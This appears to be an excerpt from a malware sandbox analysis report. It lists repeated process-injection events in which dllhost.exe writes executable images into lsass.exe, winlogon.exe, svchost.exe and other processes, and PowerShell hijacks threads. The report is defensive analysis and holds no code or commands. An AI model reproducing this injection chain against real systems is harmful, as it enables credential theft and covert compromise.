Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 690000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: A20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: C70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: D30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: EE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 3C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: B10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: C60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 6E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1060000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 7A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1130000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: E60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: C70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 180000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: A00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 208442D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 20E8B1C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 27B67E40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 175F9950000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1DB9D660000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 1CC91450000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 261C3DC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 2220C4F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 2220AB60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1B4EB270000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 25872BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 34D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 24D9FF40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2D0D4FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 123B8520000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 270F3B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 270F3EC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: PID: 2580 base: 1350000 value: 4D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 7744
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 2188
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 1420
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 8160
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 8180000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140001000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140004000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140006000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140007000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: B71FCA7010
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\winlogon.exe base: 225DC610000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\winlogon.exe base: 225DC640000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\lsass.exe base: 202C0AB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\lsass.exe base: 202C0AE0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A6612D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A661300000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dwm.exe base: 2BAAF1A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dwm.exe base: 2BAAF230000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26A87990000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17953770000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2295D530000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 253067D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1845B390000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D559040000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 241A9E70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1CD73160000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2824E860000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21B473C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2086F9D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17183BC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23FD3F70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D2A4150000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 275BDF30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1AAC0260000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 203C9F30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B5645B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1C004F60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 24E2AB40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2644ADB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\spoolsv.exe base: 1990000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 20D25DA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26EF5350000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B1C2570000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2108BA90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 29166900000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1988D570000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 13869B40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1E1CC740000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2855DA70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2BF199D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 15AF3890000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21A03B80000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\sihost.exe base: 1CD40E40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 151A6530000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 19E27BC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17D7B150000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1BE621A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2252F480000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 184683D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\explorer.exe base: 1350000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1972E260000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 221D5930000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D1777C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A633B40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2928D0A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21C6CF30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1EF641A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\audiodg.exe base: 1D349350000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60D80000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1DEA1600000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1E97F230000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1217AF90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A680850000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 192A3140000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 3C70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 294E53C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2B83DFA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1661BCE0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 5F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 600000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 760000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 900000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1050000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 530000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1030000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 6A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: CC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1130000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1080000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: DA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: E70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: E10000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: CA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 760000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 14A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 11B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 13C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1220000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: DB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 700000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 500000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: AC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 9D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 7A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 3A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: B30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: E10000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: FF0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1500000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1300000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: B80000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1210000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 9E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 900000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 9C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: AA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 690000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1130000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1110000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: BF0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 7D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: CC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 9A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 5B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: B10000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1350000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: F50000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: B70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 7B0000
